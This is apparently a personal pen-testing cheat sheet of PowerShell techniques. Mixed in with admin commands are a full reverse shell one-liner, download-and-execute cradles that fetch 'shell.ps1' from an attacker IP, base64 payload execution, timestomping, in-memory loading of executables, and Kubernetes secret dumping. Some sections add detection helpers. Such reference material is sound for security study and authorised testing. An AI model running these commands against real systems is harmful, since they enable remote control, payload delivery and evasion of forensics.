PowerShell for Hackers

As I learn more PowerShell and dabble in hacking, I will be composing a list of techniques and scripts that I find useful for administration and pen-testing.

Basics

ipconfig

Linux-like watch Command

# re-run a command every 5 seconds until Ctrl+C (sleep is an alias for Start-Sleep)
while ($true) { docker ps -a; Start-Sleep -Seconds 5 }

System Running Processes

Get-Process

IP to Hostname

# reverse DNS lookup (GetHostByAddress is marked obsolete in .NET; GetHostEntry returns the same HostName)
[System.Net.Dns]::GetHostByAddress('192.168.0.10').HostName

Is Server Virtual or Physical?

# %computername% is cmd.exe syntax; from PowerShell use $env:COMPUTERNAME (/s also accepts a remote host name).
# A virtual machine reports a hypervisor model/manufacturer (e.g. VMware, or "Virtual Machine" for Hyper-V).
systeminfo /s $env:COMPUTERNAME | findstr /c:"System Model:" /c:"System Manufacturer:" /c:"Host Name" /c:"OS Name"

Lookup User Information

# get domain information for a user (/domain queries a domain controller instead of the local SAM)
net user jamie.bowman /domain

# get groups (with SIDs) of the current user
whoami /groups

Change File Modified Date and Time

# timestomping: this only rewrites the $STANDARD_INFORMATION timestamp; the NTFS $FILE_NAME copy keeps the real value,
# which forensic tools compare against. CreationTime and LastAccessTime can be set the same way.
(Get-Item sample_file.txt).LastWriteTime = New-Object DateTime 1976,12,31
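The one-liner above changes a single timestamp. The following is an added example, not code from the original page: it sets all three timestamps a file exposes by copying them from a reference file, and pairs that with the check an analyst runs to spot it. The file names in the usage lines are constructed placeholders.

```powershell
# Copy every timestamp from a reference file (e.g. a legitimate system binary)
# so the target blends in with its neighbours. Only $STANDARD_INFORMATION is
# affected; the $FILE_NAME timestamps in the MFT are not reachable this way.
function Copy-FileTimestamp {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$ReferencePath
    )
    $ref    = Get-Item -LiteralPath $ReferencePath
    $target = Get-Item -LiteralPath $Path
    $target.CreationTime   = $ref.CreationTime
    $target.LastWriteTime  = $ref.LastWriteTime
    $target.LastAccessTime = $ref.LastAccessTime
    # return the item so the new values can be inspected
    $target
}

# Detection side: a file cannot have been modified before it was created, so
# LastWriteTime earlier than CreationTime is a classic timestomping indicator.
# A plain file copy also produces it (copies get a fresh CreationTime but keep
# the source's LastWriteTime), so treat hits as leads, not verdicts.
function Find-SuspiciousTimestamp {
    param([string]$Directory = '.')
    Get-ChildItem -LiteralPath $Directory -File -Recurse -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -lt $_.CreationTime } |
        Select-Object FullName, CreationTime, LastWriteTime
}

# Usage (paths are placeholders)
Copy-FileTimestamp -Path .\sample_file.txt -ReferencePath C:\Windows\System32\notepad.exe
Find-SuspiciousTimestamp -Directory $env:TEMP
```

The page's own 1976 example trips Find-SuspiciousTimestamp immediately, since no file on the box was created before that; copying from a reference file avoids that tell but still leaves the $FILE_NAME record intact.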

Find Apps Running on Port

# find the process using TCP port 53 (Get-NetTCPConnection needs Windows 8 / Server 2012 or later)
Get-Process -Id (Get-NetTCPConnection -LocalPort 53).OwningProcess

# find pids listening on port 80 (works on any Windows version)
netstat -ano | findstr ":80"

# look up a pid from the netstat output; filter on the PID column rather than grepping for "4",
# which would match every line containing a 4
tasklist /FI "PID eq 4"
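The commands above answer the question one port at a time. As an added example, not code from the original page, this function maps every listening TCP port to its owning process in one pass and flags the ones bound to all interfaces. It assumes Windows 8 / Server 2012 or later, where Get-NetTCPConnection (NetTCPIP module) is available; on older hosts the netstat form above is the fallback.

```powershell
function Get-ListeningProcess {
    param(
        # Optional port filter; omit it to list every listener.
        [int[]]$Port
    )

    $conns = Get-NetTCPConnection -State Listen
    if ($Port) { $conns = $conns | Where-Object { $Port -contains $_.LocalPort } }

    # Build one PID -> process table instead of calling Get-Process per socket.
    # Keys are cast to [int] because OwningProcess is a UInt32 and hashtable
    # lookups do not match across integer types.
    $procs = @{}
    foreach ($p in Get-Process) { $procs[[int]$p.Id] = $p }

    foreach ($c in $conns) {
        $p = $procs[[int]$c.OwningProcess]
        if ($p) { $name = $p.ProcessName; $path = $p.Path } else { $name = '<exited>'; $path = $null }

        [PSCustomObject]@{
            LocalAddress = $c.LocalAddress
            LocalPort    = $c.LocalPort
            # 0.0.0.0 / :: means the service is reachable from the network, not just localhost.
            Exposed      = ($c.LocalAddress -in '0.0.0.0', '::')
            PID          = $c.OwningProcess
            Process      = $name
            # Path is empty for protected/system processes unless running elevated.
            Path         = $path
        }
    }
}

# Usage: everything that is listening, or only the ports you care about.
Get-ListeningProcess | Sort-Object LocalPort | Format-Table -AutoSize
Get-ListeningProcess -Port 80, 443, 3389
```

Run it elevated to get image paths for services running as SYSTEM; without elevation those rows show an empty Path but the PID and name are still correct.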

Base64

# convert to base64
[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes('whoami'))
# d2hvYW1p

# convert from base64
[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('d2hvYW1p'))

# execute a base64 payload in powershell: decoding alone only returns the string 'whoami',
# so the result has to go through Invoke-Expression (IEX) to actually run
powershell.exe -command "IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('d2hvYW1p')))"
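powershell.exe also has a native -EncodedCommand switch, but it expects base64 of the script's UTF-16LE ("Unicode") bytes, not UTF-8, so the blob above would not run through it. The following is an added example, not code from the original page: helpers that encode and decode in that format, plus the decoder a defender points at a logged command line, where only the blob is visible. The command line at the bottom is a constructed sample.

```powershell
function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Command)
    # UTF-16LE, which is what powershell.exe -EncodedCommand decodes
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Command))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

# Defensive side: Sysmon event 1 / Security 4688 record the command line, and
# powershell.exe accepts -EncodedCommand, -enc, -ec or -e for the same switch.
# Match any of those (but not -ep, which is -ExecutionPolicy) and decode the
# blob that follows.
function Get-DecodedCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)
    if ($CommandLine -match '(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/]+=*)') {
        ConvertFrom-EncodedCommand -Base64 $Matches[1]
    } else {
        $null   # no encoded command on this command line
    }
}

# Round trip: 'whoami' encodes to dwBoAG8AYQBtAGkA and runs through the switch.
$enc = ConvertTo-EncodedCommand -Command 'whoami'
$enc
powershell.exe -NoProfile -EncodedCommand $enc

# Constructed sample of what a process-creation log line looks like.
Get-DecodedCommandLine -CommandLine "powershell.exe -nop -w hidden -enc $enc"
```

Encoding hides nothing from a defender: the decoded script is what Script Block Logging (event 4104) records, and AMSI sees it too. It only sidesteps quoting problems when a command is passed through cmd.exe or a web shell.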

Querying Databases

https://gist.github.com/cmatskas/08411b916ab01e3f1439#file-powershellsqlquery-ps1

Domain Controllers

# get current domain name (needs the ActiveDirectory module, installed with RSAT)
$domainName = (Get-ADDomain).DNSRoot

# get all dcs
$dcs = Get-ADDomainController -Filter * -Server $domainName | Select-Object HostName, IPv4Address, IsGlobalCatalog, Site, Forest, OperatingSystem
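The ActiveDirectory module is rarely present on a workstation or a compromised server. As an added example, not code from the original page, the same enumeration through System.DirectoryServices.ActiveDirectory, which ships with the .NET Framework and works on any domain-joined host; the column names mirror Get-ADDomainController so the output is interchangeable. The domain name in the last usage line is a placeholder.

```powershell
Add-Type -AssemblyName System.DirectoryServices

function Get-DomainControllerInfo {
    param(
        # Defaults to the domain of the current user/computer.
        [string]$DomainName
    )

    if ($DomainName) {
        $ctx    = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $DomainName)
        $domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($ctx)
    } else {
        $domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
    }

    foreach ($dc in $domain.DomainControllers) {
        [PSCustomObject]@{
            HostName        = $dc.Name
            IPv4Address     = $dc.IPAddress
            IsGlobalCatalog = $dc.IsGlobalCatalog()
            Site            = $dc.SiteName
            Forest          = $dc.Forest.Name
            OperatingSystem = $dc.OSVersion
            # FSMO roles held by this DC (PDC emulator, RID master, ...); empty for most DCs.
            Roles           = ($dc.Roles -join ', ')
        }
    }
}

# Usage: current domain, or a named one (requires trust/credentials to reach it).
Get-DomainControllerInfo | Format-Table -AutoSize
Get-DomainControllerInfo -DomainName 'corp.example.local'
```

The Roles column is the interesting one for a tester: the PDC emulator is the DC that every password change and lockout is replicated to first, so it is the one to query for fresh account state.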

Downloading Files with PowerShell

# powershell one-liner using System.Net.WebClient
# (a relative output path resolves against the process working directory, which may differ from the prompt's location)
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.26/shell.ps1', 'shell.ps1')

# powershell one-liner using Invoke-WebRequest (PowerShell 3+; add -UseBasicParsing on hosts where IE first-run setup has not completed)
Invoke-WebRequest -Uri 'http://10.10.14.26/shell.ps1' -OutFile 'shell.ps1'

# download and invoke execution in memory; the script is never written to disk, but its text still passes through AMSI
IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.26/shell.ps1')

PowerShell Reverse Shells

powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Start a listener on <LISTENERIP> (netcat on port 443, for example) before launching this. The one-liner is written to be launched from cmd.exe or a web shell: typed into an interactive PowerShell prompt, the double-quoted string would expand $client and the other variables before the child process ever sees them, so switch to single quotes there. -exec bypass only relaxes the execution policy, which is not a security boundary; the traffic itself is plaintext and the command line is recorded in process-creation logs.

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell

Kubernetes

# dump a secret's values decoded: secret data is only base64-encoded, not encrypted (@base64d needs jq 1.6 or later)
kubectl get secret/nameofsecret -o json | jq '.data | map_values(@base64d)'

Loading Executables in PowerShell

# load from disk; LoadFile keeps the assembly bound to that path and the file stays on disk for AV to inspect
[Reflection.Assembly]::LoadFile("C:\Users\mrjamiebowman\Desktop\defnotmal.exe")
# call the entry point; if Main is declared as Main(string[] args) it must be given an array, e.g. Main([string[]]@())
[DefNotMal.Program]::Main()

Assemblies cannot be unloaded from an AppDomain: once loaded this way the assembly stays resident for the lifetime of the PowerShell process, so if you need to load a changed build (or get rid of a mistake), close PowerShell and start a new session.
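LoadFile needs the executable on disk and a hard-coded type name. As an added example, not code from the original page, the in-memory variant: read the bytes, hand them to Assembly.Load, and call whatever entry point the assembly declares, handling both Main() and Main(string[] args). The path in the usage line is the page's placeholder, not a file that exists.

```powershell
function Invoke-AssemblyFromBytes {
    param(
        [Parameter(Mandatory)][byte[]]$Bytes,
        [string[]]$Arguments = @()
    )

    # Assembly.Load(byte[]) maps the image straight into the current AppDomain;
    # nothing new lands on disk. On .NET Framework 4.8+ these bytes are handed
    # to AMSI before the load completes, so this is not invisible to AV.
    $asm = [Reflection.Assembly]::Load($Bytes)

    $entry = $asm.EntryPoint
    if (-not $entry) { throw "$($asm.FullName) has no entry point (is it a DLL?)" }

    # Main may be declared with or without a string[] parameter; match it.
    if ($entry.GetParameters().Count -eq 0) {
        $entry.Invoke($null, $null)
    } else {
        # The outer array holds the one string[] argument Main expects.
        $entry.Invoke($null, @(, $Arguments))
    }
    # The return value (if Main returns int) comes back to the caller.
}

# The assembly stays resident until this PowerShell process exits.
$bytes = [IO.File]::ReadAllBytes('C:\Users\mrjamiebowman\Desktop\defnotmal.exe')
Invoke-AssemblyFromBytes -Bytes $bytes -Arguments @('--help')
```

Because Main runs on PowerShell's own thread, anything it writes to the console appears inline, and an unhandled exception in it surfaces as a PowerShell error rather than crashing the host.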

Windows Exploit Suggester

Windows Exploit Suggester is a Python script, but the system information it needs has to be collected on the target with PowerShell or CMD.

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

systeminfo > sysinfo.txt

Feed that file to Windows Exploit Suggester, which compares the installed hotfixes against Microsoft's bulletin database and lists missing patches with public exploits, which helps with privilege escalation. Note that Microsoft stopped publishing the security bulletin spreadsheet the script consumes in 2017, so it is of little use against systems patched after that.

PowerShell Frameworks & Tools

These are proven frameworks that can be used to reliably exploit a Windows environment.

Using Vim with PowerShell

First, install Vim: download and run the installer “gvim82.exe” (as of 02/06/2020) from

https://www.vim.org/download.php#pc

Once Vim is installed, run PowerShell as Administrator to configure the integration.

# install the latest PSReadLine; Windows PowerShell 5.1 ships an older inbox copy from a different publisher,
# which PowerShellGet refuses to replace without -SkipPublisherCheck
Install-Module -Name PSReadLine -Force -SkipPublisherCheck

# create aliases (put these in $PROFILE so they persist across sessions)
New-Alias -Name vi -Value 'C:\Program Files (x86)\vim\vim82\vim.exe'
New-Alias -Name vim -Value 'C:\Program Files (x86)\vim\vim82\vim.exe'

# vi key bindings at the prompt
Set-PSReadLineOption -EditMode Vi -BellStyle None

You can learn more from this article:
https://codeandkeep.com/PowerShell-And-Vim/